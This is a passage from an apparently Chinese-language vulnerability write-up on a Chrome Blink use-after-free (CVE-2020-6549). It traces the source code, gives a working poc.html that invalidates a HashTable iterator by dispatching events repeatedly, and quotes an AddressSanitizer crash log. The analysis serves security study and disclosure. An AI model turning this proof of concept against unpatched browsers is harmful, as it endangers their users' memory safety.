class="string">&#x27;127.0.0.1&#x27;</span>);</span></span><br><span class="line"><span class="language-javascript">&#125;</span></span><br><span class="line"><span class="language-javascript"></span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></table></figure></li></ul><h4 id="4-再次调用UpdateSources">4. 再次调用UpdateSources</h4><p>通过以上的分析，我们可以尝试在<code>UpdateSources</code>函数内部，再次调用JS代码（指JS事件处理函数中的代码）。那么我们该如何通过JS代码再次调用<code>UpdateSources</code>函数呢？</p><p>在执行跨域操作时断下并打印stackframe，我们可以发现一个特殊函数：<code>MediaElementEventListener::Invoke</code></p><p><img src="/2020/10/CVE-2020-6549/switchSrc.png" alt="img"></p><p>这里我们找出其源代码，将无关代码精简后如下所示：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">MediaElementEventListener::Invoke</span><span class="params">(ExecutionContext* context,</span></span></span><br><span class="line"><span class="params"><span class="function">                                       Event* event)</span> </span>&#123;</span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> (event-&gt;<span class="built_in">type</span>() == event_type_names::kEnded) &#123;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">    <span class="keyword">return</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">if</span> (event-&gt;<span class="built_in">type</span>() != event_type_names::kLoadedmetadata)</span><br><span class="line">    <span class="keyword">return</span>;</span><br><span class="line"></span><br><span class="line">  <span class="comment">// If |media_element_| is a MediaStream, clone the new tracks.</span></span><br><span class="line">  <span class="keyword">if</span> (media_element_-&gt;<span class="built_in">GetLoadType</span>() == WebMediaPlayer::kLoadTypeMediaStream) &#123;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">    <span class="built_in">UpdateSources</span>(context);</span><br><span class="line">    <span class="keyword">return</span>;</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="comment">// ....</span></span><br><span class="line">  <span class="built_in">UpdateSources</span>(context);</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>我们可以很容易的理解，<code>Invoke</code>函数负责事件的分发操作。当我们用JS来对某个对象执行<code>dispatchEvent</code>函数来分发事件时，最终render会执行到该函数中。</p><p>在这里我们只需绕过两个判断条件即可执行到<code>UpdateSources</code>函数，即传入的<code>event-&gt;type()</code>必须为<code>event_type_names::kLoadedmetadata</code>。通过交叉引用查询可知，该类型所对应的字符串为<code>loadedmetadata</code>。</p><p>因此，我们可以编写如下语句来调用<code>UpdateSources</code>函数。</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">audio.<span class="title function_">dispatchEvent</span>(<span class="keyword">new</span> <span class="title class_">Event</span>(<span class="string">&#x27;loadedmetadata&#x27;</span>));</span><br></pre></td></tr></table></figure><h4 id="5-迭代器失效">5. 迭代器失效</h4><ul><li><p>现在，我们已经可以通过内层<code>UpdateSources</code>函数向<code>sources_</code>集合中<strong>插入元素</strong>。</p><p>但我们如何使最外层的<code>UpdateSources</code>函数所使用的下一个<strong>迭代器失效</strong>呢？这里就涉及到<code>sources_</code>集合的结构。</p><p>但由于Chrome中的数据结构通常是一个个基本结构所派生出来的，所以我们可以直接查看<code>souces_.insert</code>函数中的交叉引用，来找到<code>sources_</code>实际使用的插入函数是哪一个数据结构的基本操作。</p><p>最后我们可以找到<strong>实际调用的insert函数是HashTable</strong>的。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">MediaElementEventListener::UpdateSources</span><span class="params">(ExecutionContext* context)</span> </span>&#123;</span><br><span class="line">  <span class="keyword">for</span> (<span class="keyword">auto</span> track : media_stream_-&gt;<span class="built_in">getTracks</span>())</span><br><span class="line">    <span class="comment">// 点击当前insert</span></span><br><span class="line">    sources_.<span class="built_in">insert</span>(track-&gt;<span class="built_in">Component</span>()-&gt;<span class="built_in">Source</span>());</span><br><span class="line"><span class="comment">// ...</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">template</span> &lt;<span class="keyword">typename</span> T, <span class="keyword">typename</span> U, <span class="keyword">typename</span> V, <span class="keyword">typename</span> W&gt;</span><br><span class="line"><span class="keyword">template</span> &lt;<span class="keyword">typename</span> IncomingValueType&gt;</span><br><span class="line"><span class="keyword">inline</span> <span class="keyword">typename</span> HashSet&lt;T, U, V, W&gt;::AddResult HashSet&lt;T, U, V, W&gt;::<span class="built_in">insert</span>(</span><br><span class="line">    IncomingValueType&amp;&amp; value) &#123;</span><br><span class="line">    <span class="comment">// 点击当前insert</span></span><br><span class="line">  <span class="keyword">return</span> impl_.<span class="built_in">insert</span>(std::forward&lt;IncomingValueType&gt;(value));</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">template</span> &lt;<span class="keyword">typename</span> IncomingValueType&gt;</span><br><span class="line"><span class="function">AddResult <span class="title">insert</span><span class="params">(IncomingValueType&amp;&amp; value)</span> </span>&#123;</span><br><span class="line">      <span class="comment">// 点击当前insert</span></span><br><span class="line">  <span class="keyword">return</span> <span class="built_in">insert</span>&lt;IdentityTranslatorType&gt;(</span><br><span class="line">      Extractor::<span class="built_in">Extract</span>(value), std::forward&lt;IncomingValueType&gt;(value));</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// 最终找到，所用的insert函数为HashTable</span></span><br><span class="line">HashTable&lt;Key, Value, Extractor, HashFunctions, Traits, KeyTraits, Allocator&gt;::</span><br><span class="line">    <span class="built_in">insert</span>(T&amp;&amp; key, Extra&amp;&amp; extra) &#123; <span class="comment">/* ... */</span>  &#125;</span><br></pre></td></tr></table></figure></li><li><p>这里给出<code>HashTable::insert</code>的部分源码，不过我们只关注其中的部分内容</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* ... */</span></span><br><span class="line"><span class="keyword">typename</span> HashTable&lt; <span class="comment">/* ... */</span> &gt;::AddResult</span><br><span class="line">HashTable&lt;Key, Value, Extractor, HashFunctions, Traits, KeyTraits, Allocator&gt;::</span><br><span class="line">    <span class="built_in">insert</span>(T&amp;&amp; key, Extra&amp;&amp; extra) &#123;</span><br><span class="line">  <span class="comment">// ....</span></span><br><span class="line"></span><br><span class="line">  ++key_count_;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> (<span class="built_in">ShouldExpand</span>()) &#123;</span><br><span class="line">    entry = <span class="built_in">Expand</span>(entry);</span><br><span class="line">  &#125; <span class="keyword">else</span> <span class="keyword">if</span> (WTF::IsWeak&lt;ValueType&gt;::value &amp;&amp; <span class="built_in">ShouldShrink</span>()) &#123;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">  &#125;</span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>在插入元素的过程中，当哈希表的空间大小不足，需要扩张哈希表空间时，程序将会开辟一块新的内存空间，但<strong>原来的空间将会被删除</strong>。一旦原先空间被删除，那么就会使得<strong>基于指针的旧哈希表迭代器失效！</strong></p><p>这样，我们就可以使外层<code>UpdateSources</code>所使用的哈希表迭代器失效，进而触发UAF。</p><blockquote><p>这里需要提一下Chrome中的HashTable结构。与SGI STL中的哈希表有点不同，该结构似乎没有使用桶（Bucket），而是简单的一个一维数组，使用哈希值进行索引。</p><p>因此其迭代器的递增操作也只是简单的一个指针移动操作。</p></blockquote><p>所以在JS事件处理函数<code>onended</code>中，我们需要执行以下JS代码</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 通过重复调用UpdateSources函数以达到大量插入元素，最终扩展内存空间，使得原迭代器无效的目的</span></span><br><span class="line"><span class="keyword">for</span> (<span class="keyword">let</span> i = <span class="number">0</span>; i &lt; <span class="number">1000</span>; ++i)</span><br><span class="line">    audio.<span class="title function_">dispatchEvent</span>(<span class="keyword">new</span> <span class="title class_">Event</span>(<span class="string">&#x27;loadedmetadata&#x27;</span>));</span><br></pre></td></tr></table></figure></li></ul><h4 id="6、POC">6、POC</h4><blockquote><p>将上面的JS代码组合一下就是下面的POC。</p></blockquote><blockquote><p>注：调试POC时<strong>必须在本地打开一个WebServer</strong>，而不是直接用File协议加载html代码。</p></blockquote><ul><li><p><strong>audio.mp3</strong></p><p>这里的音乐文件一定是要可以正常播放的文件，而不是随便某个文件改名为<code>audio.mp3</code>。这样JS代码中<code>stream.getAudioTracks()</code>返回的才不会是空的列表。</p></li><li><p><strong>poc.html</strong></p><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">    <span class="comment">// 执行流程 poc() -&gt; stream.onaddtrack() -&gt; track.onended()</span></span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">function</span> <span class="title function_">poc</span>(<span class="params"></span>) &#123;</span></span><br><span class="line"><span class="language-javascript">        <span class="variable constant_">AUDIO_URL</span> = <span class="string">&#x27;http://localhost:8000/audio.mp3&#x27;</span>;</span></span><br><span class="line"><span class="language-javascript">        audio = <span class="keyword">new</span> <span class="title class_">Audio</span>(<span class="variable constant_">AUDIO_URL</span>);</span></span><br><span class="line"><span class="language-javascript">        stream = audio.<span class="title function_">captureStream</span>();</span></span><br><span class="line"><span class="language-javascript">        stream.<span class="property">onaddtrack</span> = <span class="function">() =&gt;</span> &#123;</span></span><br><span class="line"><span class="language-javascript">            <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&quot;[+] execute stream.onaddtrack&quot;</span>);</span></span><br><span class="line"><span class="language-javascript">            track = stream.<span class="title function_">getAudioTracks</span>()[<span class="number">0</span>];</span></span><br><span class="line"><span class="language-javascript">            track.<span class="property">onended</span> = <span class="keyword">function</span> (<span class="params"></span>) &#123;</span></span><br><span class="line"><span class="language-javascript">                <span class="keyword">for</span> (<span class="keyword">let</span> i = <span class="number">0</span>; i &lt; <span class="number">1000</span>; ++i)&#123;</span></span><br><span class="line"><span class="language-javascript">                    <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&quot;[+] try dispatchEvent&quot;</span>);</span></span><br><span class="line"><span class="language-javascript">                    audio.<span class="title function_">dispatchEvent</span>(<span class="keyword">new</span> <span class="title class_">Event</span>(<span class="string">&#x27;loadedmetadata&#x27;</span>));</span></span><br><span class="line"><span class="language-javascript">                &#125;</span></span><br><span class="line"><span class="language-javascript">            &#125;</span></span><br><span class="line"><span class="language-javascript">            <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&quot;[+] try load different URL&quot;</span>);</span></span><br><span class="line"><span class="language-javascript">            audio.<span class="property">src</span> = <span class="variable constant_">AUDIO_URL</span>.<span class="title function_">replace</span>(<span class="string">&#x27;localhost&#x27;</span>, <span class="string">&#x27;127.0.0.1&#x27;</span>);</span></span><br><span class="line"><span class="language-javascript">            <span class="comment">// 先执行完当前的js代码，再执行track.onended</span></span></span><br><span class="line"><span class="language-javascript">        &#125;</span></span><br><span class="line"><span class="language-javascript">        <span class="comment">// 先执行完当前的js代码，再执行stream.onaddtrack</span></span></span><br><span class="line"><span class="language-javascript">        <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&quot;[+] try to enter stream.onaddtrack&quot;</span>);</span></span><br><span class="line"><span class="language-javascript">    &#125;</span></span><br><span class="line"><span class="language-javascript">    <span class="title function_">poc</span>();</span></span><br><span class="line"><span class="language-javascript"></span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;<span class="name">body</span>&gt;</span><span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure></li><li><p>这是漏洞提交者打印出的<a href="https://bugs.chromium.org/p/project-zero/issues/attachmentText?aid=456254">Asan log</a></p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br></pre></td><td class="code"><pre><span class="line">==<span class="number">1</span>==ERROR: AddressSanitizer: use-after-poison on address <span class="number">0x7ef4388d0ab8</span> at pc <span class="number">0x7f87439d82fd</span> bp <span class="number">0x7ffdcd9cd990</span> sp <span class="number">0x7ffdcd9cd988</span></span><br><span class="line">READ of size <span class="number">8</span> at <span class="number">0x7ef4388d0ab8</span> thread <span class="built_in">T0</span> (chrome)</span><br><span class="line">    #<span class="number">0</span> <span class="number">0x7f87439d82fc</span> in blink::MemberBase&lt;blink::MediaStreamSource, (blink::TracenessMemberConfiguration)<span class="number">0</span>&gt;::<span class="built_in">GetRaw</span>() <span class="type">const</span> ./../../third_party/blink/renderer/platform/heap/member.h:<span class="number">250</span>:<span class="number">44</span></span><br><span class="line">    #<span class="number">1</span> <span class="number">0x7f87439d82fc</span> in blink::MemberBase&lt;blink::MediaStreamSource, (blink::TracenessMemberConfiguration)<span class="number">0</span>&gt;::<span class="keyword">operator</span> blink::MediaStreamSource*() <span class="type">const</span> ./../../third_party/blink/renderer/platform/heap/member.h:<span class="number">184</span>:<span class="number">32</span></span><br><span class="line">    #<span class="number">2</span> <span class="number">0x7f87439d82fc</span> in <span class="type">bool</span> WTF::HashTraitsEmptyValueChecker&lt;WTF::HashTraits&lt;blink::WeakMember&lt;blink::MediaStreamSource&gt; &gt;, <span class="literal">false</span>&gt;::IsEmptyValue&lt;blink::WeakMember&lt;blink::MediaStreamSource&gt; &gt;(blink::WeakMember&lt;blink::MediaStreamSource&gt; <span class="type">const</span>&amp;) ./../../third_party/blink/renderer/platform/wtf/hash_traits.h:<span class="number">350</span>:<span class="number">12</span></span><br><span class="line">    #<span class="number">3</span> <span class="number">0x7f87439d82fc</span> in <span class="type">bool</span> WTF::IsHashTraitsEmptyValue&lt;WTF::HashTraits&lt;blink::WeakMember&lt;blink::MediaStreamSource&gt; &gt;, blink::WeakMember&lt;blink::MediaStreamSource&gt; &gt;(blink::WeakMember&lt;blink::MediaStreamSource&gt; <span class="type">const</span>&amp;) ./../../third_party/blink/renderer/platform/wtf/hash_traits.h:<span class="number">355</span>:<span class="number">10</span></span><br><span class="line">    #<span class="number">4</span> <span class="number">0x7f87439d82fc</span> in WTF::HashTableHelper&lt;blink::WeakMember&lt;blink::MediaStreamSource&gt;, WTF::IdentityExtractor, WTF::HashTraits&lt;blink::WeakMember&lt;blink::MediaStreamSource&gt; &gt; &gt;::<span class="built_in">IsEmptyBucket</span>(blink::WeakMember&lt;blink::MediaStreamSource&gt; <span class="type">const</span>&amp;) ./../../third_party/blink/renderer/platform/wtf/hash_table.h:<span class="number">666</span>:<span class="number">12</span></span><br><span class="line">    #<span class="number">5</span> <span class="number">0x7f87439d82fc</span> in WTF::HashTableHelper&lt;blink::WeakMember&lt;blink::MediaStreamSource&gt;, WTF::IdentityExtractor, WTF::HashTraits&lt;blink::WeakMember&lt;blink::MediaStreamSource&gt; &gt; &gt;::<span class="built_in">IsEmptyOrDeletedBucket</span>(blink::WeakMember&lt;blink::MediaStreamSource&gt; <span class="type">const</span>&amp;) ./../../third_party/blink/renderer/platform/wtf/hash_table.h:<span class="number">673</span>:<span class="number">12</span></span><br><span class="line">    #<span class="number">6</span> <span class="number">0x7f87439d82fc</span> in WTF::HashTable&lt;blink::WeakMember&lt;blink::MediaStreamSource&gt;, blink::WeakMember&lt;blink::MediaStreamSource&gt;, WTF::IdentityExtractor, WTF::MemberHash&lt;blink::MediaStreamSource&gt;, WTF::HashTraits&lt;blink::WeakMember&lt;blink::MediaStreamSource&gt; &gt;, WTF::HashTraits&lt;blink::WeakMember&lt;blink::MediaStreamSource&gt; &gt;, blink::HeapAllocator&gt;::<span class="built_in">IsEmptyOrDeletedBucket</span>(blink::WeakMember&lt;blink::MediaStreamSource&gt; <span class="type">const</span>&amp;) ./../../third_party/blink/renderer/platform/wtf/hash_table.h:<span class="number">841</span>:<span class="number">12</span></span><br><span class="line">    #<span class="number">7</span> <span class="number">0x7f87439d82fc</span> in WTF::HashTableConstIterator&lt;blink::WeakMember&lt;blink::MediaStreamSource&gt;, blink::WeakMember&lt;blink::MediaStreamSource&gt;, WTF::IdentityExtractor, WTF::MemberHash&lt;blink::MediaStreamSource&gt;, WTF::HashTraits&lt;blink::WeakMember&lt;blink::MediaStreamSource&gt; &gt;, WTF::HashTraits&lt;blink::WeakMember&lt;blink::MediaStreamSource&gt; &gt;, blink::HeapAllocator&gt;::<span class="built_in">SkipEmptyBuckets</span>() ./../../third_party/blink/renderer/platform/wtf/hash_table.h:<span class="number">296</span>:<span class="number">12</span></span><br><span class="line">    #<span class="number">8</span> <span class="number">0x7f87439d82fc</span> in WTF::HashTableConstIterator&lt;blink::WeakMember&lt;blink::MediaStreamSource&gt;, blink::WeakMember&lt;blink::MediaStreamSource&gt;, WTF::IdentityExtractor, WTF::MemberHash&lt;blink::MediaStreamSource&gt;, WTF::HashTraits&lt;blink::WeakMember&lt;blink::MediaStreamSource&gt; &gt;, WTF::HashTraits&lt;blink::WeakMember&lt;blink::MediaStreamSource&gt; &gt;, blink::HeapAllocator&gt;::<span class="keyword">operator</span>++() ./../../third_party/blink/renderer/platform/wtf/hash_table.h:<span class="number">373</span>:<span class="number">5</span></span><br><span class="line">    #<span class="number">9</span> <span class="number">0x7f87439d82fc</span> in WTF::HashTableConstIteratorAdapter&lt;WTF::HashTable&lt;blink::WeakMember&lt;blink::MediaStreamSource&gt;, blink::WeakMember&lt;blink::MediaStreamSource&gt;, WTF::IdentityExtractor, WTF::MemberHash&lt;blink::MediaStreamSource&gt;, WTF::HashTraits&lt;blink::WeakMember&lt;blink::MediaStreamSource&gt; &gt;, WTF::HashTraits&lt;blink::WeakMember&lt;blink::MediaStreamSource&gt; &gt;, blink::HeapAllocator&gt;, WTF::HashTraits&lt;blink::WeakMember&lt;blink::MediaStreamSource&gt; &gt; &gt;::<span class="keyword">operator</span>++() ./../../third_party/blink/renderer/platform/wtf/hash_table.h:<span class="number">2219</span>:<span class="number">5</span></span><br><span class="line">    #<span class="number">10</span> <span class="number">0x7f87439d82fc</span> in blink::(anonymous <span class="keyword">namespace</span>)::MediaElementEventListener::<span class="built_in">UpdateSources</span>(blink::ExecutionContext*) ./../../third_party/blink/renderer/modules/mediacapturefromelement/html_media_element_capture.cc:<span class="number">249</span>:<span class="number">22</span></span><br><span class="line">    #<span class="number">11</span> <span class="number">0x7f87439e1d8f</span> in blink::(anonymous <span class="keyword">namespace</span>)::MediaElementEventListener::<span class="built_in">Invoke</span>(blink::ExecutionContext*, blink::Event*) ./../../third_party/blink/renderer/modules/mediacapturefromelement/html_media_element_capture.cc:<span class="number">231</span>:<span class="number">3</span></span><br><span class="line">    #<span class="number">12</span> <span class="number">0x7f874f33e534</span> in blink::EventTarget::<span class="built_in">FireEventListeners</span>(blink::Event&amp;, blink::EventTargetData*, blink::HeapVector&lt;blink::RegisteredEventListener, <span class="number">1u</span>&gt;&amp;) ./../../third_party/blink/renderer/core/dom/events/event_target.cc:<span class="number">909</span>:<span class="number">15</span></span><br><span class="line">    #<span class="number">13</span> <span class="number">0x7f874f33c411</span> in blink::EventTarget::<span class="built_in">FireEventListeners</span>(blink::Event&amp;) ./../../third_party/blink/renderer/core/dom/events/event_target.cc:<span class="number">823</span>:<span class="number">29</span></span><br><span class="line">    #<span class="number">14</span> <span class="number">0x7f874f3b13fa</span> in blink::Node::<span class="built_in">HandleLocalEvents</span>(blink::Event&amp;) ./../../third_party/blink/renderer/core/dom/node.cc:<span class="number">2896</span>:<span class="number">3</span></span><br><span class="line">    #<span class="number">15</span> <span class="number">0x7f874f312ae3</span> in blink::EventDispatcher::<span class="built_in">DispatchEventAtTarget</span>() ./../../third_party/blink/renderer/core/dom/events/event_dispatcher.cc:<span class="number">264</span>:<span class="number">29</span></span><br><span class="line">    #<span class="number">16</span> <span class="number">0x7f874f312ae3</span> in blink::EventDispatcher::<span class="built_in">Dispatch</span>() ./../../third_party/blink/renderer/core/dom/events/event_dispatcher.cc:<span class="number">206</span>:<span class="number">11</span></span><br><span class="line">    #<span class="number">17</span> <span class="number">0x7f874f311022</span> in blink::EventDispatcher::<span class="built_in">DispatchEvent</span>(blink::Node&amp;, blink::Event&amp;) ./../../third_party/blink/renderer/core/dom/events/event_dispatcher.cc:<span class="number">63</span>:<span class="number">16</span></span><br><span class="line">    #<span class="number">18</span> <span class="number">0x7f874f33261d</span> in blink::EventQueue::<span class="built_in">DispatchEvent</span>(blink::Event*) ./../../third_party/blink/renderer/core/dom/events/event_queue.cc:<span class="number">105</span>:<span class="number">13</span></span><br><span class="line">    #<span class="number">19</span> <span class="number">0x7f8775685257</span> in base::OnceCallback&lt;<span class="built_in">void</span> ()&gt;::<span class="built_in">Run</span>() &amp;&amp; ./../../base/callback.h:<span class="number">99</span>:<span class="number">12</span></span><br><span class="line">    #<span class="number">20</span> <span class="number">0x7f8775685257</span> in base::TaskAnnotator::<span class="built_in">RunTask</span>(<span class="type">char</span> <span class="type">const</span>*, base::PendingTask*) ./../../base/task/common/task_annotator.cc:<span class="number">142</span>:<span class="number">33</span></span><br><span class="line">    #<span class="number">21</span> <span class="number">0x7f87756c413a</span> in base::sequence_manager::internal::ThreadControllerWithMessagePumpImpl::<span class="built_in">DoWorkImpl</span>(base::sequence_manager::LazyNow*) ./../../base/task/sequence_manager/thread_controller_with_message_pump_impl.cc:<span class="number">332</span>:<span class="number">23</span></span><br><span class="line">    #<span class="number">22</span> <span class="number">0x7f87756c3a5c</span> in base::sequence_manager::internal::ThreadControllerWithMessagePumpImpl::<span class="built_in">DoWork</span>() ./../../base/task/sequence_manager/thread_controller_with_message_pump_impl.cc:<span class="number">252</span>:<span class="number">36</span></span><br><span class="line">    #<span class="number">23</span> <span class="number">0x7f877558447d</span> in base::MessagePumpDefault::<span class="built_in">Run</span>(base::MessagePump::Delegate*) ./../../base/message_loop/message_pump_default.cc:<span class="number">39</span>:<span class="number">55</span></span><br><span class="line">    #<span class="number">24</span> <span class="number">0x7f87756c53a2</span> in base::sequence_manager::internal::ThreadControllerWithMessagePumpImpl::<span class="built_in">Run</span>(<span class="type">bool</span>, base::TimeDelta) ./../../base/task/sequence_manager/thread_controller_with_message_pump_impl.cc:<span class="number">451</span>:<span class="number">12</span></span><br><span class="line">    #<span class="number">25</span> <span class="number">0x7f87756209fa</span> in base::RunLoop::<span class="built_in">Run</span>() ./../../base/run_loop.cc:<span class="number">124</span>:<span class="number">14</span></span><br><span class="line">    #<span class="number">26</span> <span class="number">0x7f876bb0b546</span> in content::<span class="built_in">RendererMain</span>(content::MainFunctionParams <span class="type">const</span>&amp;) ./../../content/renderer/renderer_main.cc:<span class="number">230</span>:<span class="number">16</span></span><br><span class="line">    #<span class="number">27</span> <span class="number">0x7f876bec022e</span> in content::<span class="built_in">RunZygote</span>(content::ContentMainDelegate*) ./../../content/app/content_main_runner_impl.cc:<span class="number">496</span>:<span class="number">14</span></span><br><span class="line">    #<span class="number">28</span> <span class="number">0x7f876bec3615</span> in content::ContentMainRunnerImpl::<span class="built_in">Run</span>(<span class="type">bool</span>) ./../../content/app/content_main_runner_impl.cc:<span class="number">863</span>:<span class="number">10</span></span><br><span class="line">    #<span class="number">29</span> <span class="number">0x7f877592a987</span> in service_manager::<span class="built_in">Main</span>(service_manager::MainParams <span class="type">const</span>&amp;) ./../../services/service_manager/embedder/main.cc:<span class="number">454</span>:<span class="number">29</span></span><br><span class="line">    #<span class="number">30</span> <span class="number">0x7f876bebe69f</span> in content::<span class="built_in">ContentMain</span>(content::ContentMainParams <span class="type">const</span>&amp;) ./../../content/app/content_main.cc:<span class="number">19</span>:<span class="number">10</span></span><br><span class="line">    #<span class="number">31</span> <span class="number">0x55f64fe33063</span> in ChromeMain ./../../chrome/app/chrome_main.cc:<span class="number">118</span>:<span class="number">12</span></span><br><span class="line">    #<span class="number">32</span> <span class="number">0x7f873e9a9e0a</span> in __libc_start_main /build/glibc-M65Gwz/glibc<span class="number">-2.30</span>/csu/../csu/libc-start.c:<span class="number">308</span>:<span class="number">16</span></span><br><span class="line"></span><br><span class="line">Address <span class="number">0x7ef4388d0ab8</span> is a wild pointer.</span><br><span class="line">SUMMARY: AddressSanitizer: use-after-<span class="built_in">poison</span> (/chromium/src/out/release_asan/libblink_modules.so<span class="number">+0x1b082fc</span>)</span><br><span class="line">Shadow bytes around the buggy address:</span><br><span class="line">  <span class="number">0x0fdf07112100</span>: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7</span><br><span class="line">  <span class="number">0x0fdf07112110</span>: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7</span><br><span class="line">  <span class="number">0x0fdf07112120</span>: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7</span><br><span class="line">  <span class="number">0x0fdf07112130</span>: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7</span><br><span class="line">  <span class="number">0x0fdf07112140</span>: f7 f7 f7 f7 f7 f7 f7 f7 f7 <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> f7</span><br><span class="line">=&gt;<span class="number">0x0fdf07112150</span>: <span class="number">00</span> <span class="number">00</span> f7 <span class="number">00</span> <span class="number">00</span> f7 f7[f7]f7 f7 f7 <span class="number">00</span> <span class="number">00</span> f7 <span class="number">00</span> <span class="number">00</span></span><br><span class="line">  <span class="number">0x0fdf07112160</span>: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 <span class="number">00</span> <span class="number">00</span> f7 <span class="number">00</span> <span class="number">00</span> f7</span><br><span class="line">  <span class="number">0x0fdf07112170</span>: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7</span><br><span 